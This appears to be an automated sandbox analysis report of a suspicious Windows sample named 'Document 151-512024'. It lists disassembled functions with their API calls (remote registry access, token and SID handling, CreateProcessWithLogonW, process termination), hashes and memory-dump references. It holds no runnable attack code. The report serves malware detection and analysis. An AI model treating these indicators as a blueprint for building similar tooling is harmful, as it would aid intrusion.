Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: FA81E473A00706DBE724AF68DC52B6B73ADEFC1724F24853AF559D6681EB70D9008B50

Function 009761FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009682D9,009682D9,?,?,?,0097644F,00000001,00000001,8BE85006), ref: 00976258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0097644F,00000001,00000001,8BE85006,?,?,?), ref: 009762DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009763D8
__freea.LIBCMT ref: 009763E5

Part of subcall function 00973820: RtlAllocateHeap.NTDLL(00000000,?,00A11444,?,0095FDF5,?,?,0094A976,00000010,00A11440,009413FC,?,009413C6,?,00941129), ref: 00973852

__freea.LIBCMT ref: 009763EE
__freea.LIBCMT ref: 00976413

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: cfbc14b76dcdf120b1e1f303c668a1465d187233523f68030f094591e233ffb4
Instruction ID: ff0451a093e0caa30bafaf9495db4d4cdce6e0c80523d284e270f4373a0499c2
Opcode Fuzzy Hash: cfbc14b76dcdf120b1e1f303c668a1465d187233523f68030f094591e233ffb4
Instruction Fuzzy Hash: 2451CF73600A16ABEB258F64CC81FAF77A9EB84B50F158629FC09D6151EB34DC44D660

Function 009CBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

Part of subcall function 009CC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009CB6AE,?,?), ref: 009CC9B5
Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CC9F1
Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CCA68
Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009CBCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009CBD25
RegCloseKey.ADVAPI32(00000000), ref: 009CBD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009CBD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 009CBDF3
RegCloseKey.ADVAPI32(?), ref: 009CBDFF

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 8d6601302e71ec0c1c2bd68050b37a48431ca9c7fa89c023fae51df68fa21873
Instruction ID: cc3e22a30e3bf2df2002e155c69947217bcd104a45bb7ff262d1e1ba4e4f0cce
Opcode Fuzzy Hash: 8d6601302e71ec0c1c2bd68050b37a48431ca9c7fa89c023fae51df68fa21873
Instruction Fuzzy Hash: 5C819070518241AFC714DF24C896F2ABBE9FF84308F14895DF49A4B2A2DB31ED45CB92

Function 0099F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0099F7B9
SysAllocString.OLEAUT32(00000001), ref: 0099F860
VariantCopy.OLEAUT32(0099FA64,00000000), ref: 0099F889
VariantClear.OLEAUT32(0099FA64), ref: 0099F8AD
VariantCopy.OLEAUT32(0099FA64,00000000), ref: 0099F8B1
VariantClear.OLEAUT32(?), ref: 0099F8BB

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 288662f16ad749f31259b641a9f877a6b03cd158adf5579c7d81eedf9e4b2b0e
Instruction ID: 0a6659997a4faa235156532ece7778eb12eb78eb4e3d35a728b294535efadc0f
Opcode Fuzzy Hash: 288662f16ad749f31259b641a9f877a6b03cd158adf5579c7d81eedf9e4b2b0e
Instruction Fuzzy Hash: D651D635610310BACF24AF69D8A5B69F3A8EF85320F248867F906DF291DB74CC40C796

Function 009B910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00947620: _wcslen.LIBCMT ref: 00947625

Part of subcall function 00946B57: _wcslen.LIBCMT ref: 00946B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 009B94E5
_wcslen.LIBCMT ref: 009B9506
_wcslen.LIBCMT ref: 009B952D
GetSaveFileNameW.COMDLG32(00000058), ref: 009B9585

Strings

X, xrefs: 009B9412

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 819b3c7ec0f4556a7eaf5f51a26576353e351d0d3d1d43963573f697e0c87554
Instruction ID: d73d253bb5cc3d05c65fb8590bf7129c983d98ad23ad87e75f47328752afbb2a
Opcode Fuzzy Hash: 819b3c7ec0f4556a7eaf5f51a26576353e351d0d3d1d43963573f697e0c87554
Instruction Fuzzy Hash: A6E18B319183018FD724DF24C981FAAB7E4BF85324F04896DF9999B2A2DB31DD05CB92

Function 0095920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2

BeginPaint.USER32(?,?,?), ref: 00959241
GetWindowRect.USER32(?,?), ref: 009592A5
ScreenToClient.USER32(?,?), ref: 009592C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 009592D3
EndPaint.USER32(?,?,?,?,?), ref: 00959321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009971EA

Part of subcall function 00959339: BeginPath.GDI32(00000000), ref: 00959357

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: b6fb3be686db9560cebaaf0647cb8181bec4bcbc60710dc94c5b894004de9886
Instruction ID: ea71935315e06a2e11f7875215411447b8410f90a4626438244079a5d9a3f5df
Opcode Fuzzy Hash: b6fb3be686db9560cebaaf0647cb8181bec4bcbc60710dc94c5b894004de9886
Instruction Fuzzy Hash: E641A370109301EFE721DF65CC84FBA7BB8EF55321F144669FAA4871A1C7319849DB61

Function 009B07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 009B080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 009B0847
EnterCriticalSection.KERNEL32(?), ref: 009B0863
LeaveCriticalSection.KERNEL32(?), ref: 009B08DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 009B08F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 009B0921

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 1d02e4462e13e909ce8067a4312ad2a171c2cc83fede35fbc3110be00c63e508
Instruction ID: 155b37d36c597813e1d7a10250bfade4958fee3e72ca2888a9d12eb42f0b0163
Opcode Fuzzy Hash: 1d02e4462e13e909ce8067a4312ad2a171c2cc83fede35fbc3110be00c63e508
Instruction Fuzzy Hash: 21416971900205EFDF14EF54DC85AAA77B8FF84320F1440A5ED04AA297DB31DE65DBA0

Function 009A4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 009A4C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009A4CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009A4CEA
_wcslen.LIBCMT ref: 009A4D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009A4D10
_wcsstr.LIBVCRUNTIME ref: 009A4D1A

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 7065de480caf05523edc185d0820a82bbd4098bd0e3f870fe4f134aa3ffd6d76
Instruction ID: 3936ec47491f13846a7640208bd02adca08f799177720b0f079f1d678ec104af
Opcode Fuzzy Hash: 7065de480caf05523edc185d0820a82bbd4098bd0e3f870fe4f134aa3ffd6d76
Instruction Fuzzy Hash: 7621F9726052017BEB159B399C4AE7B7BACDFC6760F10403AF809CA191DEA5DC40D7E0

Function 009B581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00943AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00943A97,?,?,00942E7F,?,?,?,00000000), ref: 00943AC2

_wcslen.LIBCMT ref: 009B587B
CoInitialize.OLE32(00000000), ref: 009B5995
CoCreateInstance.OLE32(009DFCF8,00000000,00000001,009DFB68,?), ref: 009B59AE
CoUninitialize.OLE32 ref: 009B59CC

Strings

.lnk, xrefs: 009B5876, 009B58C1, 009B5985

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 93d7dab42d3944c01f5be1522ce329656eb1341f22e55d95733055bde4258fe6
Instruction ID: 44632d50214d689f0dfdc3c4bb17e7e8eed9fe2176582f12d7684dfb76edb760
Opcode Fuzzy Hash: 93d7dab42d3944c01f5be1522ce329656eb1341f22e55d95733055bde4258fe6
Instruction Fuzzy Hash: C1D18271A087119FC704DF24C580A6ABBE5FF89724F11885DF88A9B361DB32EC45CB92

Function 009A175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009A0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009A0FCA
Part of subcall function 009A0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009A0FD6
Part of subcall function 009A0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009A0FE5
Part of subcall function 009A0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009A0FEC
Part of subcall function 009A0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009A1002

GetLengthSid.ADVAPI32(?,00000000,009A1335), ref: 009A17AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 009A17BA
HeapAlloc.KERNEL32(00000000), ref: 009A17C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 009A17DA
GetProcessHeap.KERNEL32(00000000,00000000,009A1335), ref: 009A17EE
HeapFree.KERNEL32(00000000), ref: 009A17F5

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 570c0ed33d1b113a80465dfb36af273f7ce1c421451a17b450b45c49f392920f
Instruction ID: de102773c85c18339bd6b40b2ecfc135628f8f30abb306fff7be7f4a53cc36f8
Opcode Fuzzy Hash: 570c0ed33d1b113a80465dfb36af273f7ce1c421451a17b450b45c49f392920f
Instruction Fuzzy Hash: 8111BE75559216FFDB109FA4CC49FAE7BADEB42359F104019F481A7290C735A980DBA0

Function 009A14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009A14FF
OpenProcessToken.ADVAPI32(00000000), ref: 009A1506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009A1515
CloseHandle.KERNEL32(00000004), ref: 009A1520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009A154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 009A1563

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 943a04af3fd855222f0fb9ecb242f1bb794b8e2b75c37b308babbbcbc4183590
Instruction ID: bdd2dd2ecb8674c1c64e6a9b14032a728a40919aeef2667802fc0ec3c02d9dc8
Opcode Fuzzy Hash: 943a04af3fd855222f0fb9ecb242f1bb794b8e2b75c37b308babbbcbc4183590
Instruction Fuzzy Hash: 19113DB264520EABDF118F98DD49FDE7BADEF49748F044115FA05A2060C375CE60EB60

Function 00963382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00963379,00962FE5), ref: 00963390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0096339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009633B7
SetLastError.KERNEL32(00000000,?,00963379,00962FE5), ref: 00963409

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: c42e32f54a2f2b40367aa1c1de0539c42412f11a28bab853733d1bbbf5add253
Instruction ID: 590a90e877ffb9bd11ca409d0f16b64353d2645e19ef05286358456455c35d7b
Opcode Fuzzy Hash: c42e32f54a2f2b40367aa1c1de0539c42412f11a28bab853733d1bbbf5add253
Instruction Fuzzy Hash: 2001F23360D712BEEA252BF4BC86A676B98EB457B9760832AF510812F0FF114E139544

Function 00972D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00975686,00983CD6,?,00000000,?,00975B6A,?,?,?,?,?,0096E6D1,?,00A08A48), ref: 00972D78
_free.LIBCMT ref: 00972DAB
_free.LIBCMT ref: 00972DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0096E6D1,?,00A08A48,00000010,00944F4A,?,?,00000000,00983CD6), ref: 00972DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0096E6D1,?,00A08A48,00000010,00944F4A,?,?,00000000,00983CD6), ref: 00972DEC
_abort.LIBCMT ref: 00972DF2

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 7d23cd2de1372d713f9bcebd6e57d1a93e017219641d4b5967a6228348dfccdb
Instruction ID: 9143c713c34111d251b3d53cbb883cfeca86d8c5a4f47a90c8ba84c32216757d
Opcode Fuzzy Hash: 7d23cd2de1372d713f9bcebd6e57d1a93e017219641d4b5967a6228348dfccdb
Instruction Fuzzy Hash: ECF0283796960177C6322778BC06F5A276DAFC27B0F25C619F82C961D2EF2488825120

Function 009D8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00959639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00959693
Part of subcall function 00959639: SelectObject.GDI32(?,00000000), ref: 009596A2
Part of subcall function 00959639: BeginPath.GDI32(?), ref: 009596B9
Part of subcall function 00959639: SelectObject.GDI32(?,00000000), ref: 009596E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 009D8A4E
LineTo.GDI32(?,00000003,00000000), ref: 009D8A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 009D8A70
LineTo.GDI32(?,00000000,00000003), ref: 009D8A80
EndPath.GDI32(?), ref: 009D8A90
StrokePath.GDI32(?), ref: 009D8AA0

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 125daebfc9a44b445adc5bdabf7b83dc8bebbfb6a02e14b2485aeca9bc99ce7e
Instruction ID: c345e0540a3996b03e3d249caabd57b535e56255763ede94e58eea246d2013e4
Opcode Fuzzy Hash: 125daebfc9a44b445adc5bdabf7b83dc8bebbfb6a02e14b2485aeca9bc99ce7e
Instruction Fuzzy Hash: 4111097604514DFFEF129F90DC88EAA7F6CEB08350F00C012FA199A1A1C7719D95EBA0

Function 009A51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 009A5218
GetDeviceCaps.GDI32(00000000,00000058), ref: 009A5229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009A5230
ReleaseDC.USER32(00000000,00000000), ref: 009A5238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 009A524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 009A5261

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: c9c715701f38d1ec7b97175f3a360b47c549b1794621502c2935d9dc651e5674
Instruction ID: f07ef8ffd579bd9f07d38d79deb427c1edafb0724156ce797ee75e2d0bf6c7ec
Opcode Fuzzy Hash: c9c715701f38d1ec7b97175f3a360b47c549b1794621502c2935d9dc651e5674
Instruction Fuzzy Hash: E7018FB5A45719BBEF109BE59C49B4EBFB8EF48351F044066FA04A7280D6709800DBA0

Function 00941BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00941BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00941BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00941C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00941C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00941C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00941C22

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 36c8900d2f306aa97e72e450b11bd943a63426f5f40ef8c4fdf00138e5059b08
Instruction ID: dec43ec43034c8b61838035907ea1b9ae88cd125b283d86f2386ef4d27acee30
Opcode Fuzzy Hash: 36c8900d2f306aa97e72e450b11bd943a63426f5f40ef8c4fdf00138e5059b08
Instruction Fuzzy Hash: 8D016CB094275A7DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5

Function 009AEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009AEB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009AEB46
GetWindowThreadProcessId.USER32(?,?), ref: 009AEB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009AEB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009AEB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009AEB75

Memory Dump Source

